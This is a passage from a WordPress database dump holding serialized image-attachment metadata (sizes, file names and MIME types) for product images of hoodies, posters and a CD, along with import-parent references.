\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"hoodie_5_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"hoodie_5_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(105,57,'_wxr_import_parent','56'),(106,58,'_wp_attached_file','2013/06/hoodie_5_back.jpg'),(107,58,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/hoodie_5_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"hoodie_5_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"hoodie_5_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"hoodie_5_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"hoodie_5_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"hoodie_5_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"hoodie_5_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(108,58,'_wxr_import_parent','56'),(109,61,'_wp_attached_file','2013/06/hoodie_6_front.jpg'),(110,61,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:26:\"2013/06/hoodie_6_front.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"hoodie_6_front-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"hoodie_6_front-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"hoodie_6_front-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:26:\"hoodie_6_front-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:26:\"hoodie_6_front-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:26:\"hoodie_6_front-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(111,61,'_wxr_import_parent','60'),(112,62,'_wp_attached_file','2013/06/hoodie_6_back.jpg'),(113,62,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/hoodie_6_back.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"hoodie_6_back-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"hoodie_6_back-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"hoodie_6_back-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"hoodie_6_back-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"hoodie_6_back-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"hoodie_6_back-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(114,62,'_wxr_import_parent','60'),(115,68,'_wp_attached_file','2013/06/poster_1_up.jpg'),(116,68,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:23:\"2013/06/poster_1_up.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"poster_1_up-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"poster_1_up-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"poster_1_up-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"poster_1_up-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"poster_1_up-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"poster_1_up-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(117,68,'_wxr_import_parent','67'),(118,69,'_wp_attached_file','2013/06/Poster_1_flat.jpg'),(119,69,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/Poster_1_flat.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Poster_1_flat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Poster_1_flat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Poster_1_flat-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Poster_1_flat-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Poster_1_flat-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Poster_1_flat-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(120,69,'_wxr_import_parent','67'),(121,71,'_wp_attached_file','2013/06/poster_2_up.jpg'),(122,71,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:23:\"2013/06/poster_2_up.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"poster_2_up-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"poster_2_up-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"poster_2_up-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"poster_2_up-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"poster_2_up-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"poster_2_up-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(123,71,'_wxr_import_parent','70'),(124,72,'_wp_attached_file','2013/06/Poster_2_flat.jpg'),(125,72,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/Poster_2_flat.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Poster_2_flat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Poster_2_flat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Poster_2_flat-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Poster_2_flat-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Poster_2_flat-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Poster_2_flat-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(126,72,'_wxr_import_parent','70'),(127,74,'_wp_attached_file','2013/06/poster_3_up.jpg'),(128,74,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:23:\"2013/06/poster_3_up.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"poster_3_up-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"poster_3_up-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"poster_3_up-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"poster_3_up-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"poster_3_up-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"poster_3_up-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(129,74,'_wxr_import_parent','73'),(130,75,'_wp_attached_file','2013/06/Poster_3_flat.jpg'),(131,75,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/Poster_3_flat.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Poster_3_flat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Poster_3_flat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Poster_3_flat-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Poster_3_flat-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Poster_3_flat-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Poster_3_flat-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(132,75,'_wxr_import_parent','73'),(133,77,'_wp_attached_file','2013/06/poster_4_up.jpg'),(134,77,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:23:\"2013/06/poster_4_up.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"poster_4_up-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"poster_4_up-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"poster_4_up-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"poster_4_up-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"poster_4_up-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"poster_4_up-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(135,77,'_wxr_import_parent','76'),(136,78,'_wp_attached_file','2013/06/Poster_4_flat.jpg'),(137,78,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/Poster_4_flat.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Poster_4_flat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Poster_4_flat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Poster_4_flat-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Poster_4_flat-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Poster_4_flat-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Poster_4_flat-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(138,78,'_wxr_import_parent','76'),(139,80,'_wp_attached_file','2013/06/poster_5_up.jpg'),(140,80,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:23:\"2013/06/poster_5_up.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"poster_5_up-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"poster_5_up-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"poster_5_up-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"poster_5_up-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"poster_5_up-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"poster_5_up-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(141,80,'_wxr_import_parent','79'),(142,81,'_wp_attached_file','2013/06/Poster_5_flat.jpg'),(143,81,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:25:\"2013/06/Poster_5_flat.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Poster_5_flat-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Poster_5_flat-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Poster_5_flat-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:25:\"Poster_5_flat-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:25:\"Poster_5_flat-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:25:\"Poster_5_flat-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(144,81,'_wxr_import_parent','79'),(145,84,'_wp_attached_file','2013/06/cd_1_angle.jpg'),(146,84,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:1000;s:4:\"file\";s:22:\"2013/06/cd_1_angle.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"cd_1_angle-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"cd_1_angle-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"cd_1_angle-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:22:\"cd_1_angle-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:22:\"cd_1_angle-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:22:\"cd_1_angle-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(147,84,'_wxr_import_parent','83'),(148,1230,'_wp_attached_file','2016/02/team1.jpg'),(149,1230,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:400;s:4:\"file\";s:17:\"2016/02/team1.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumb